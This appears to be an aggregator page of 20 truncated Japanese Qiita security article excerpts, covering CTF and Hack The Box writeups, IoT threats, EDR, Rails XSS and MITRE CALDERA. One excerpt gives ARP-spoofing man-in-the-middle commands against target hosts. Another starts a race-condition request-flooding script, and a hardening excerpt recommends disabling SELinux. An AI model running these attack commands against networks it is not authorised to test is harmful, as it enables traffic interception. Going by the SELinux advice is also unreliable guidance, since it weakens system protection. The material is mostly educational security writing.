- 1. CISM試験に合格するために実施したこと
- 2. Hack The Box[Netmon] -Writeup-
- 3. 【備忘】5G時代に備えるべきIoTを狙ったサイバー攻撃と対策を復習
- 4. RDSのMariaDBにてロールを使って権限管理
- 5. ドメイン駆動設計の戦略的デザインとA2AD戦略を組み合わせた多層防御システムの考案
- 6. ARPスプーフィング手順 ( 中間者攻撃 , MITM )
- 7. 【メモ】サイバーセキュリティ演習
- 8. 【メモ】Twitter 2020年7月
- 9. RaspberryPi で初歩のセキュリティハンズオン
- 10. Hack The Box[Jerry] -Writeup-
- 11. 社内で毎週公開してるセキュリティコンテンツ3ヶ月分を公開します【2020年4月〜7月】
- 12. EPP/EDRって何?
- 13. NITIC CTF WriteUp
- 14. Hack The Box[Valentine] -Writeup-
- 15. CentOS7でのセキュリテイ強化
- 16. Turbo intruderでrace conditionを調査する
- 17. 退職される度に全サーバーのauthorized_keysを編集するのが辛い
- 18. セキュリティインシデント発生時の対応を考える
- 19. Railsで学ぶXSS脆弱性
- 20. サイバーセキュリティ・フレームワーク「MITRE CALDERA」紹介:使用方法・トレーニング編
CISM試験に合格するために実施したこと
ISACAのCISM(Certified Information Security Manager)試験に合格(2020/07/07)した際に利用した教材と勉強法です。CISMの詳細については[こちら](https://www.isaca.org/credentialing/cism)を参照。
# 背景
これまで取得したセキュリティの資格は、CEHとCSSLP。CEHの勉強法は[こちら](https://qiita.com/lorenpasserine/items/df4556bdab424a3cd71f)、CSSLPの勉強法は[こちら](https://qiita.com/lorenpasserine/items/f499a6a63dae9c54395b)。英語力は TOEIC 800後半くらい。# 役に立った学習教材
試験勉強にあたって利用した学習教材です。### [CISM Review Questions, Answers & Explanations Database](https://www.isaca.org/education/online-tools-and
Hack The Box[Netmon] -Writeup-
# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731# Netmon
![コメント 2020-07-27 150137.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/8449e15c-cc54-5d35-e667-81f96351dd3c.
【備忘】5G時代に備えるべきIoTを狙ったサイバー攻撃と対策を復習
# 初めに
5Gの登場により、医療・福祉・交通インフラ・農業など様々な分野でのIoT活用が期待され、急速に成長しています。
IDC は、2025 年までに世界で 416 億のデバイスが接続され、合計 79.4 ゼタバイトのデータを生成すると予測しています。
そして、Statista は、2025 年にオンラインで接続されるエンドポイントは 750 億を超えると予測しています。そんな中、この注目市場を狙った攻撃手段が次々と出てきており、それらへの対策はビジネスしていく中だけでなく、生きていく上で必須と言えるでしょう。
今ある主な攻撃と対策を以下にまとめました。
# IoTデバイスを狙うマルウェア「Mirai」
2016年頃、世界的に感染が広がったマルウェアが「Mirai」です。
ハッカーズネットにソースコードを投稿した者が「Anna-senpai」(杏奈先輩@@?)という、かわいらしいネーミングですが、その影響はかわいらしくないものでした。
インターネットにつながる様々なIoT機器を標的に、これら機器の脆弱性を利用してMiraiが感染すると、攻撃者が遠隔操作可能な状態(踏み台)
RDSのMariaDBにてロールを使って権限管理
# はじめに
AWSのRDSにて、MariaDBを使ってみました。
サービスごとに権限を分けてロールで管理して使うようにしたのですが、
そのような例がネット上にあまり見つからなかったので、
記録として残しておきます。実行したMariaDBのバージョンは10.4です。
ロール機能は10.0.5からですが、
実質的にはデフォルトロールが使える10.1からが
ロール対応バージョンということのようです。ちなみにMySQLでは8.0からロール機能が使えます。
# 構成
![概要図.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/436247/025f7b44-459d-0243-359f-74a95e72b7d2.png)
サービスごとにDB(スキーマ)をservice01_db, service02_dbの2つ作ります。
service01_roleに属しているservice01_userはservice01_dbにのみアクセス可能にします。
service02についても同様です。どちらのDBに
ドメイン駆動設計の戦略的デザインとA2AD戦略を組み合わせた多層防御システムの考案
#領域支配戦略に基づくドメイン駆動設計の戦略的デザインの考案
サイバー空間はクラッカーによるDoS攻撃やハッキングによる遠隔操作など行われる攻撃手法が年々進化しているが、攻撃に対する有効な防衛手法が確立されていない。
これは、防衛方法に統一された理論が存在せず、各々がファイヤーウォールやDMZなど様々な手段で対抗しているのが原因だと思われる。
今回の記事では、エリックエヴァンスが考案した**戦略的デザイン**のアイディアに領域支配戦略である**A2AD戦略**の思想を取り入れ、サイバー空間に統一した防衛理論を提案する。#A2AD戦略とは
**A2AD(接近阻止・領域拒否)戦略**とは、空母や戦闘機による支配領域への侵入を拒否するために考案された領域支配戦略のことである。
**A2AD戦略**は接近阻止(A2)戦略と領域拒否(AD)作戦によって構成される。
**A2AD戦略**は領域に侵入する対象の手段に対抗する非対称的なアプローチを用いる。
空母や戦闘機は電子機器の塊であるため、電磁波領域からのジャミングなどに脆弱である。
戦略レベルによって実行されミサイル防衛システムによる接近阻
ARPスプーフィング手順 ( 中間者攻撃 , MITM )
## 1. 攻撃対象のIPアドレス取得
“`
ifconfig
“`
“`
arp -a
“`
“`
nmap -F 192.168.XXX.XXX/24
“`
などなど![](https://i.imgur.com/3AJGXxB.png)
## 2. 攻撃者のPCを経由するパケットをフォワードさせるためにIPフォワーディングを有効
1で有効“`
echo 1 > /proc/sys/net/ipv4/ip_forward
“`0で無効
“`
echo 0 > /proc/sys/net/ipv4/ip_forward
“`![](https://i.imgur.com/GGbQHTO.png)
## 3. ARPテーブル書き換え
NICを wlan0 に指定して,192.168.100.123 のARPテーブルにある 192.168.100.124 のMACアドレスを攻撃者(自身)のMACアドレスに書き換える“`
sudo arpspoof -i wlan0 -t 192.168.100.123 192.168.100.124
“
【メモ】サイバーセキュリティ演習
CTFやサイバーセキュリティ演習にどんなものが?を調べたリスト
# Cyber storm
* Newton Consulting: [海外事例に学ぶサイバー演習手法その③-Cyber Storm IV](https://www.newton-consulting.co.jp/itilnavi/column/cyber_storm_V.html)
* METI: [平成 29 年度サイバーセキュリティ経済基盤構築事業 METI/IBM] (https://www.meti.go.jp/meti_lib/report/H29FY/000120.pdf)
* JETRO/IPA: [米国連邦政府のサイバーセキュリティ政策を巡る最近の動向 2011-03] (http://www.jif.org/column/pdf2011/201103.pdf)
* 星野英二氏[米国国土安全保障省(DHS)が全国家的規模の第1回「サーバー・ストーム演習」の完了を報告 2010-10-06 20](https://blog.goo.ne.jp/hosiei/e/def9cd69f5aa2bdd
【メモ】Twitter 2020年7月
my first Qiita!
事件概要のメモ
#Twitterのアカウント乗っ取り事件(Twitter社)
01 Twitter: [An update on our security incident](https://blog.twitter.com/en_us/topics/company/2020/an-update-on-our-security-incident.html)
02 [Official Tweet] (https://twitter.com/TwitterSupport/status/1283518038445223936)> We are aware of a security incident impacting accounts on Twitter. We are investigating and taking steps to fix it. We will update everyone shortly.
# 関連記事
11 日本経済新聞: [ツイッター、言論基盤に傷 著名人アカウント乗っ取り 米大統領選前に不正な侵入許す](
ht
RaspberryPi で初歩のセキュリティハンズオン
「オープンハードセキュリティ #4」
https://openhardsecurity.connpass.com/event/183696/
のテキストです。深センのものづくり企業 Ideagear の社内勉強会を兼ねて、セキュリティの初歩的なハンズオンをします。
# やること
– 19:00 オープニング、ssh 設定、自己紹介、Ideagear の説明など
– 19:20 RaspberryPi にログイン、Linuxの 基本操作
– 19:30 破壊行為実習
– 19:40 ハニーポッド設置、ログ監視
– 19:50 クロージング、次回開催のアナウンス講師のRaspberry Pi 上にインターネット経由で ssh でログオンできるようにしています。
![image.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/139524/ef95b884-702d-5012-e9f1-09075695d7c6.png)
写真は別勉強会でRaspberryPiを使って更に他のワンボードマイコン
Hack The Box[Jerry] -Writeup-
# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731# Jerry
社内で毎週公開してるセキュリティコンテンツ3ヶ月分を公開します【2020年4月〜7月】
# はじめに
普段はWeb開発を生業としている [おりばー(@oliver_diary)](https://twitter.com/oliver_diary) です。今年の4月から**情報処理安全確保支援士**として、社内のセキュリティ向上に努めているのですが、その取り組みの一つとして社内Slackに毎週セキュリティトピックを公開しています。
毎週続けて3ヶ月が経過しましたが、社内だけに閉じておくのは勿体ないと思ったので、記事としてまとめて投稿します。**みなさんのセキュリティ意識向上の助けになればと思います。**
またセキュリティ研修用に使用したアプリケーションの記事も公開しているので、そちらも併せてご覧ください。
https
EPP/EDRって何?
# システム環境の変化とセキュリティに対する考え方の変化
オンプレミスの環境では“境界防御”、企業情報システムとインターネットのようなオープンネットワークの境界に、FirewallやIDS/IPS(侵入検知/防止システム)などのシステムを設置することで、
境界線から内側を守るという考え方が主流であった。しかし、クラウドサービスとモバイル機器が浸透した現在のビジネス環境では、守るべき対象は境界の内部だけではなくなっており、データの多くはクラウド側にも存在する。
このような環境では、“境界”という概念自体が希薄なものになり、エンドポイント(端末)の単位でガードを固めることが必須になってきている。Gartnerによるセキュリティ関連に関するハイプサイクルではEDR(エンドポイントの検知/対応)は幻滅期に入っており、初期の過熱的な段階を超えたとみられている。
![gartner0708.jpg](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/640480/92af3493-2399-aa0b-4b18-bb6d
NITIC CTF WriteUp
NITIC CTFに参加しました。
公式から答えが出ていますが、備忘録としてWritesupを記載します。
スコアサーバー
https://ctf.waku-waku-club.com/contest/nitic_ctf_1![score.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/156890/f4d7f92f-97c6-d34b-568b-9965fb2a7861.png)
# Dangerous Twitter
対象のアカウントから、サイトのパスワードを調査するもの。
色々見ていたところ、投稿されている画像の一枚(https://twitter.com/FPC_COMMUNITY/status/1284684386361724928/photo/1 )に、パスワードが記載されており
それが答えになる。FLAG:nitic_ctf{abaE33F5}
~~色々調べすぎて、作者の裏アカウントまで知ってしまいました~~# 8^
Hack The Box[Valentine] -Writeup-
# はじめに
Hack The Boxの攻略などを自分用にまとめたものです。
主に記録用として記しています。
現在のランクはHackerです。
間違っていることも多いかと思いますが、よろしくお願いします。
チートシートも公開しておりますが知識がまだまだ不足しているため、学習経過とともに身につけた内容などを随時更新していきます。
GitHub(ペネトレーションテスト用チートシート):
https://github.com/yukitsukai47/PenetrationTesting_cheatsheet
Twitter:@yukitsukai1731# Valentine
![スクリーンショット 2020-07-20 16.58.04.png](https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/447800/ef62d399-4a47-060d-4cfd-14
CentOS7でのセキュリテイ強化
#大前提
ここに書く事を全てやれば良いわけでは無いと思っている。
AWS,GCP,さくらクラウド等の環境でサービスを提供する場合や、
オンプレ環境でサービスを提供する場合でも、
セキュリティ強化の方法や設計思想は必ずしも同じではない。
何をどこまで、どのようにして、どのレベルで守るかは、
所属する組織や個人で適切に検討する必要がある。
例えば、WAFを導入すればセキュリティが高まると知りつつも、
金額が高いとゆう事で購入できなかったりもする。
セキュリティを高めた結果、運用に支障がでる場合も少なからずある。#超重要
セキュリティを強化するために、あれこれ調査して設定する事も重要ですが、
設定した後に、正しく設定されていることを確認する事が最も重要です。#SELinuxを無効にする
CentOS7の場合は、デフォルトでは有効(enforcing)
selinuxについて深い知見がある場合は、有効のままで良い
自分の場合は、有効にしていると色々と厄介なので無効にする####一時的に無効にする
Permissiveになる
再起動すると有効になる“`
# setenforce
Turbo intruderでrace conditionを調査する
Burp Suiteの[Turbo intruder](https://github.com/PortSwigger/turbo-intruder)を使用してrace conditionを調査する方法。
1. BApp StoreからTurbo Intruderを入れる
1. 大量に送信したいリクエストを1つキャプチャする
1. Proxy > HTTP historyから当該リクエストを右クリック → Send to turbo intruder
1. 下記スクリプトを入力 (https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race.py をベースに微修正)“`python
# script for testing race condition
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
退職される度に全サーバーのauthorized_keysを編集するのが辛い
そう思っていましたが退職した方から解決策を教えていただきました。AWSのEC2の話になります。
今パブリックに公開しているSSHのポートはセキュリティグループで閉じてしまい、秘密鍵だけがあっても入れないようにしてしまいましょう。
その上でセッションマネージャー使うことで、AWSCLIアクセスキーによる認証でSSHできるようになります。
秘密鍵の制御はサーバーの数だけ作業しないといけませんが、AWSのアカウントはコンソールで一元制御かつ簡単に無効化できるので、サーバーが大量にある場合に特に効果を発揮します。以下デモです。EC2インスタンスを作成します。EC2インスタンスにロール`AmazonSSMManagedInstanceCore`や`AmazonSSMRoleForInstancesQuickSetup `がアタッチされることで、セッションマネージャーからアクセスできるようになります。初期状態だとロールがないので、セッションマネージャーの高速セットアップで作成しましょう。
セキュリティインシデント時スピード感を持ち対応できるよう、対策を調べてみました。
発言は全て個人のもので所属する組織の見解ではありません。
# 目的
有事に備え(インシデント発生前、発生後のマニュアル)# 想定するセキュリティインシデント
– 情報漏洩
– マルウェア感染
– サービス不能攻撃(DoS、DDoS、EDoS)
– 紛失、故障等# 事前に準備が必要なこと
– 従業員のセキュリティ意識向上の努力
– 適切なマルウェア対策
– 使用製品のセキュリティ情報を収集・対策
– 適切なログ取得
– 侵入検知システムによる監視
– 適切なバックアップ、遠隔への保存
– サービスの復旧優先度を定める
– 優先度3
– 業務が停止することは許されない
– 優先度2
– 24時間以内に復旧しなければならない
– 優先度1
– 3日以内に復旧しなければならない
– 優先度0
– インシデント発生時は停止しても良い
– 社内向けに攻撃訓練を行う
– 標的型メール送付訓練など
Railsで学ぶXSS脆弱性
webセキュリティについて勉強中なので、学習内容を公開します
スカスカ記事ですがお許しください#演習環境
– Ubuntu 18.04.4
– Ruby (2.6.6)
– Rails (5.2.4.3)
– database adapter mysql2 (0.5.3)
– mysql (5.7.30)記事投稿、コメント投稿、ブックマークなどが出来る演習用アプリ「TARGET」
GitHubリポジトリ https://github.com/Fumitaka1/target#XSS脆弱性とは
XSSには反射型、持続型、DOMベースの3タイプに分類され、単にXSSというと反射型XSSを指すことが多いようです。上記の3タイプに共通する性質として「外部からのパラメータを用いてwebページを出力しているアプリケーションにおいて、任意のhtml要素や属性が挿入出来てしまう」所がXSS脆弱性の肝です。
挿入されたスクリプトによってセッションや入力データが流出したり、有害な操作やリダイレクトが可能になるなど多くの被害が発生します。
例 演習用アプリでは投稿にコメントする機
サイバーセキュリティ・フレームワーク「MITRE CALDERA」紹介:使用方法・トレーニング編
# サイバーセキュリティ・フレームワーク「MITRE CALDERA」紹介:使用方法・トレーニング編
## はじめに
### 趣旨
本記事は、『サイバーセキュリティ・フレームワーク「MITRE CALDERA」紹介』の 第四弾「使用方法・トレーニング編」です。
本編では、セキュリティ人材育成に活用できる MITRE CALDERA の使い方を紹介します。
機能概要や環境構築につきましては第一弾「[機能概要・動作環境構築編](https://qiita.com/shiracamus/items/658ea3e5b28fa5ae3245)」をご覧ください。### 記事構成
紹介内容が多いため、以下の4記事に分けて紹介しています。
* [機能概要・動作環境構築編](https://qiita.com/shiracamus/items/658ea3e5b28fa5ae3245)
* [使用方法:レッドチーム編](https://qiita.com/shiracamus/items/e1bbdaaeff312e9bd09e)
* [使用方法:ブルーチーム編](https://qii